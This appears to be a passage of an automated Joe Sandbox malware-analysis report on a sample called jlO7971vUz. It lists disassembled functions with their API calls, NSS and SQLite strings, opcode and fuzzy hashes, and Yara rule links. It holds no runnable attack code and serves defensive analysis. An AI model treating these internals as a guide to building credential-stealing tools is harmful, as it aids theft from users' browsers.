API ID:
String ID:
API String ID:
Opcode ID: 869be68a0b554a831d1c457a691bfdb58749a07dbe53bc421a815ad195d2f717
Instruction ID: c0546a72f927f00bbbb942dc91e7f43c1e14701f2c4bd16d07a1c0454903f05c
Opcode Fuzzy Hash: 869be68a0b554a831d1c457a691bfdb58749a07dbe53bc421a815ad195d2f717
Instruction Fuzzy Hash: E2F1E271F051158BDB08CFAAD9947AE77F0AB8A304F15822DC905E7740EB74A9A1CBCD

Function 6C5C0E20 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C5C1052
memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C5C1086

Strings

h(\l, xrefs: 6C5C0E55, 6C5C0EC4, 6C5C0F3A, 6C5C0FA7
h(\l, xrefs: 6C5C1062, 6C5C105D, 6C5C0F37, 6C5C1081, 6C5C1082

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: memcpymemset
String ID: h(\l$h(\l
API String ID: 1297977491-518356040
Opcode ID: e8fec7dcda968a66a32d28f93032c2483c361833f4490bbdd5a5adc5a8462608
Instruction ID: e34b7319084d6de05f2954784d2ea402b97e619ef7cde09c9e1508a5764ad0ae
Opcode Fuzzy Hash: e8fec7dcda968a66a32d28f93032c2483c361833f4490bbdd5a5adc5a8462608
Instruction Fuzzy Hash: A7A14C71B0125A9FCF08CF99C890AEEBBB6BF89314B14812DE905A7700D735ED51CBA5

Function 6C536900 Relevance: 6.3, Strings: 4, Instructions: 1257COMMON

Download Yara Rule

Strings

authorizer malfunction, xrefs: 6C537910
sqlite\_%, xrefs: 6C536953
BBB, xrefs: 6C537207, 6C53780B
not authorized, xrefs: 6C5378EC, 6C5378F1

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: memcpystrlen
String ID: BBB$authorizer malfunction$not authorized$sqlite\_%
API String ID: 3412268980-2664116055
Opcode ID: c7e7efd2bffa6d549280b3068700c96ddca4d5767f47f29719cbd981d1f386ab
Instruction ID: 29d302688092a9a3b27c74a2498693d6fbf291b2dac4807bce6269f9acb78048
Opcode Fuzzy Hash: c7e7efd2bffa6d549280b3068700c96ddca4d5767f47f29719cbd981d1f386ab
Instruction Fuzzy Hash: 9BC28374E00215DFCB14CF58C880AA9BBF2FF89304F24816DD919AB756E736A956CF90

Function 017F6DB0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,017E4E5E,40000001,00000000,00000000), ref: 017F6DD0

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 31167539a3d75fb04bfd91fd4844baea4b326f439f612ef2c189d74fb0bed090
Instruction ID: 57ce1bbaef47d3e521a7d490c381c9956199487e556aaa2305522943f7ef491a
Opcode Fuzzy Hash: 31167539a3d75fb04bfd91fd4844baea4b326f439f612ef2c189d74fb0bed090
Instruction Fuzzy Hash: 4F1103B5200208BFDB05DF68D885FAB77B9BF89B14F108548FA098B345D771EC929B60

Function 017E94C0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,017E4BCE,00000000,00000000), ref: 017E94EF
LocalAlloc.KERNEL32(00000040,?,?,?,017E4BCE,00000000,?), ref: 017E9501
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,017E4BCE,00000000,00000000), ref: 017E952A
LocalFree.KERNEL32(?,?,?,?,017E4BCE,00000000,?), ref: 017E953F

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: a2246ffb9d3505e51320c8ba91744621c63fc90026369abf87c405c1e454bdd4
Instruction ID: a36ce81a9d48bfbbf924aebeb650eb52198f85874e64574e096a6a86c60283a3
Opcode Fuzzy Hash: a2246ffb9d3505e51320c8ba91744621c63fc90026369abf87c405c1e454bdd4
Instruction Fuzzy Hash: 6B11A278640308AFEB51CF64CC95FAA77B5FB89714F208058FA1A9B3C0C7B5A942CB50

Function 6C4E4DB0 Relevance: 5.3, Strings: 4, Instructions: 318COMMON

Download Yara Rule

Strings

Pfl, xrefs: 6C4E5019, 6C4E50FA, 6C4E5157, 6C4E51DE, 6C4E51F2, 6C4E520D, 6C4E5220, 6C4E52A2, 6C4E52B5
winUnlockReadLock, xrefs: 6C4E5125
0fl, xrefs: 6C4E4EDE, 6C4E4F82
pfl, xrefs: 6C4E4E1C, 6C4E4E81, 6C4E4FDE, 6C4E5047, 6C4E50BB, 6C4E51A3, 6C4E526C

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID:
String ID: 0fl$Pfl$pfl$winUnlockReadLock
API String ID: 0-4118370154
Opcode ID: f2e76d73a49e2c2f2d8d3a9506f421d7feba80778c3dfb20278b0796dbc10ea3
Instruction ID: 5e34753e979b5560cb10eb8a68d3c90cd392d961bc4ade862f801633b6fc423f
Opcode Fuzzy Hash: f2e76d73a49e2c2f2d8d3a9506f421d7feba80778c3dfb20278b0796dbc10ea3
Instruction Fuzzy Hash: C5E13C70A083408FDB04DF29D494A5ABBF0FF8A305F159A1DF88997351E770A995CF86

Function 6C4E6F10 Relevance: 5.2, Strings: 4, Instructions: 218COMMON

Download Yara Rule

Strings

unordered*, xrefs: 6C4E702B
sz=[0-9]*, xrefs: 6C4E7049
noskipscan*, xrefs: 6C4E7067
*?[, xrefs: 6C4E7034, 6C4E7052, 6C4E7070

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID:
String ID: *?[$noskipscan*$sz=[0-9]*$unordered*
API String ID: 0-3485574213
Opcode ID: 01e5dc1c916b14aeb7de5fd7fd31e2cf69d5eea1fb09facc5bbd31b6080a8eff
Instruction ID: ec2ac2a639eef27acce407be8405117ca43046d25b7f802d92599ab622db3c82
Opcode Fuzzy Hash: 01e5dc1c916b14aeb7de5fd7fd31e2cf69d5eea1fb09facc5bbd31b6080a8eff
Instruction Fuzzy Hash: 8B717F32F082154BEB10CE6DC880F9EB3A29F89376F270278C955ABBC2D6715C4687C1

Function 6C57EE70 Relevance: 3.2, APIs: 2, Instructions: 223COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C57F019
PK11_GenerateRandom.NSS3(?,00000000), ref: 6C57F0F9

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: ErrorGenerateK11_Random
String ID:
API String ID: 3009229198-0
Opcode ID: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction ID: 1335aedc57697feae9a729180d6b2e50981f3f25f3901ca901338cfd5a123dea
Opcode Fuzzy Hash: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction Fuzzy Hash: A1918E75A1071A8BCB24CF68CC916AEB7F1FF85324F24472DD962A7B80D730A945CB61

Function 6C5A2F70 Relevance: 3.1, APIs: 2, Instructions: 149COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000000,?,6C5C7929), ref: 6C5A2FAC
PR_SetError.NSS3(FFFFE040,00000000,00000000,?,6C5C7929), ref: 6C5A2FE0

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Error
String ID:
API String ID: 2619118453-0
Opcode ID: 4ed65271e8b09367552bf07743ee0e25b889b706428e212bc6dff6dddc0380c7
Instruction ID: 564ec100e1a67f4f68bcd0c917489b1a18fbd5dfcc6729dc2fdad634894576ee
Opcode Fuzzy Hash: 4ed65271e8b09367552bf07743ee0e25b889b706428e212bc6dff6dddc0380c7
Instruction Fuzzy Hash: 4951CD71A049128FD714CEEBCC81A6EB3B1FB8531CF294569D9099BB11D731E947CB81

Function 6C5AED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6C5AEE3D

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Alloc_ArenaUtil
String ID:
API String ID: 2062749931-0
Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction ID: a7db99414e94d3848ef48b7ed4274336d1679c059367121b6b213307b7767a2a
Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction Fuzzy Hash: D671D272E017018FD718CF9AD88066EBBF2EB88304F15462DD85697B91D7B4E912CB90

Function 017FB5E7 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001B5A5), ref: 017FB5EC

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b004240315b0294540a703a68bc144d455c82278a3fa46afe6600cc913b7e4cf
Instruction ID: a401bfda9a7619560c2c9c427b365f412fdef02d406ea04a7e7be67b086c7d92
Opcode Fuzzy Hash: b004240315b0294540a703a68bc144d455c82278a3fa46afe6600cc913b7e4cf
Instruction Fuzzy Hash: E39002F06512444656111771AC1DD4776986A4E71A761445C6211D6108DA5440015619

Function 6C56A820 Relevance: 1.4, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

[[Ul, xrefs: 6C56A92D, 6C56A943

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID:
String ID: [[Ul
API String ID: 0-3731427980
Opcode ID: be27fe52df3f45cb913a82640edca3dbe5e180c1ba79a2ecf9d40ef8ac73a7f8
Instruction ID: 3ceab7e077ffc3ba5a4abbe3475fead01c9f99e7ddb54a6adf7fdc92c3d4ca62
Opcode Fuzzy Hash: be27fe52df3f45cb913a82640edca3dbe5e180c1ba79a2ecf9d40ef8ac73a7f8
Instruction Fuzzy Hash: AE518171A01229CFDB04CF16D944BAA7BE5FF89308F26806DE81A9BB61D730DC55CB90

Function 6C518960 Relevance: .4, Instructions: 381COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 479b8d2f213f65b1b536ab0ea025c35109ca1eff46ca7d7c516c56307c097544
Instruction ID: 6330059e3cebd6ef2fdb5681b7da15541c66226f9a44d5f3106045078909d50e
Opcode Fuzzy Hash: 479b8d2f213f65b1b536ab0ea025c35109ca1eff46ca7d7c516c56307c097544
Instruction Fuzzy Hash: D9D18371F09216CFEB18CEA9C8846AEB3F2FB85314F26852AC555E7E40D7309D41CB91

Function 6C548EA0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7ef3f8506d3bce064f0c81fec7dfd1653ab32adc9b7b549186da4c72abd4580
Instruction ID: 1745267fca9d87a1024feaef3f5d0e20e7fb79cd18ada01c7300ca3b03daabc9
Opcode Fuzzy Hash: b7ef3f8506d3bce064f0c81fec7dfd1653ab32adc9b7b549186da4c72abd4580
Instruction Fuzzy Hash: B2118F32A016159BD708DF25DC84B5AB7B5BF42318F04866AD805CFB41C775E8A6C7C6

Function 6C620C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1be313a5fef00a7d74890f82a4102e36e3cd87026a3629cc55f91b2afff0052b
Instruction ID: b1f553665ff4a18594f7bdddfd9b34a5b0e184ea2c0def9939a6435adf8bb903
Opcode Fuzzy Hash: 1be313a5fef00a7d74890f82a4102e36e3cd87026a3629cc55f91b2afff0052b
Instruction Fuzzy Hash: C711E3B87043058FCB00DF19C8D0AAA7BB5FF85368F14806DD8198B701DB75E806CBA4

Function 6C620D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: fa879c1087adaa3b66cbb555b03197b71973ff46a5dbf8c7e477a04e7801d2a6
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: E8E06D3A243058A7DB148E09C470AA97399DF82619FA4C879CC599BE01D637F8038B85

Function 017F75D0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 017FAD4A Relevance: 129.2, APIs: 86, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 017FAD5E

Part of subcall function 017F8A67: HeapFree.KERNEL32(00000000,00000000,?,017F8978,00000000,01802C50,017F89BF,?,?,?,017F8A2F,01802C50,?,?,017FB7F3,01802C50), ref: 017F8A7D
Part of subcall function 017F8A67: GetLastError.KERNEL32(?,?,017F8978,00000000,01802C50,017F89BF,?,?,?,017F8A2F,01802C50,?,?,017FB7F3,01802C50), ref: 017F8A8F

_free.LIBCMT ref: 017FAD66
_free.LIBCMT ref: 017FAD6E
_free.LIBCMT ref: 017FAD76
_free.LIBCMT ref: 017FAD7E
_free.LIBCMT ref: 017FAD86
_free.LIBCMT ref: 017FAD8D
_free.LIBCMT ref: 017FAD95
_free.LIBCMT ref: 017FAD9D
_free.LIBCMT ref: 017FADA5
_free.LIBCMT ref: 017FADAD
_free.LIBCMT ref: 017FADB5
_free.LIBCMT ref: 017FADBD
_free.LIBCMT ref: 017FADC5
_free.LIBCMT ref: 017FADCD
_free.LIBCMT ref: 017FADD5
_free.LIBCMT ref: 017FADE0
_free.LIBCMT ref: 017FADE8
_free.LIBCMT ref: 017FADF0
_free.LIBCMT ref: 017FADF8
_free.LIBCMT ref: 017FAE00
_free.LIBCMT ref: 017FAE08
_free.LIBCMT ref: 017FAE10
_free.LIBCMT ref: 017FAE18
_free.LIBCMT ref: 017FAE20
_free.LIBCMT ref: 017FAE28
_free.LIBCMT ref: 017FAE30
_free.LIBCMT ref: 017FAE38
_free.LIBCMT ref: 017FAE40
_free.LIBCMT ref: 017FAE48
_free.LIBCMT ref: 017FAE50
_free.LIBCMT ref: 017FAE58
_free.LIBCMT ref: 017FAE66
_free.LIBCMT ref: 017FAE71
_free.LIBCMT ref: 017FAE7C
_free.LIBCMT ref: 017FAE87
_free.LIBCMT ref: 017FAE92
_free.LIBCMT ref: 017FAE9D
_free.LIBCMT ref: 017FAEA8
_free.LIBCMT ref: 017FAEB3
_free.LIBCMT ref: 017FAEBE
_free.LIBCMT ref: 017FAEC9
_free.LIBCMT ref: 017FAED4
_free.LIBCMT ref: 017FAEDF
_free.LIBCMT ref: 017FAEEA
_free.LIBCMT ref: 017FAEF5
_free.LIBCMT ref: 017FAF00
_free.LIBCMT ref: 017FAF0B
_free.LIBCMT ref: 017FAF19
_free.LIBCMT ref: 017FAF24
_free.LIBCMT ref: 017FAF2F
_free.LIBCMT ref: 017FAF3A
_free.LIBCMT ref: 017FAF45
_free.LIBCMT ref: 017FAF50
_free.LIBCMT ref: 017FAF5B
_free.LIBCMT ref: 017FAF66
_free.LIBCMT ref: 017FAF71
_free.LIBCMT ref: 017FAF7C
_free.LIBCMT ref: 017FAF87
_free.LIBCMT ref: 017FAF92
_free.LIBCMT ref: 017FAF9D
_free.LIBCMT ref: 017FAFA8
_free.LIBCMT ref: 017FAFB3
_free.LIBCMT ref: 017FAFBE
_free.LIBCMT ref: 017FAFCC
_free.LIBCMT ref: 017FAFD7
_free.LIBCMT ref: 017FAFE2
_free.LIBCMT ref: 017FAFED
_free.LIBCMT ref: 017FAFF8
_free.LIBCMT ref: 017FB003
_free.LIBCMT ref: 017FB00E
_free.LIBCMT ref: 017FB019
_free.LIBCMT ref: 017FB024
_free.LIBCMT ref: 017FB02F
_free.LIBCMT ref: 017FB03A
_free.LIBCMT ref: 017FB045
_free.LIBCMT ref: 017FB050
_free.LIBCMT ref: 017FB05B
_free.LIBCMT ref: 017FB066
_free.LIBCMT ref: 017FB071
_free.LIBCMT ref: 017FB07F
_free.LIBCMT ref: 017FB08A
_free.LIBCMT ref: 017FB095
_free.LIBCMT ref: 017FB0A0
_free.LIBCMT ref: 017FB0AB
_free.LIBCMT ref: 017FB0B6

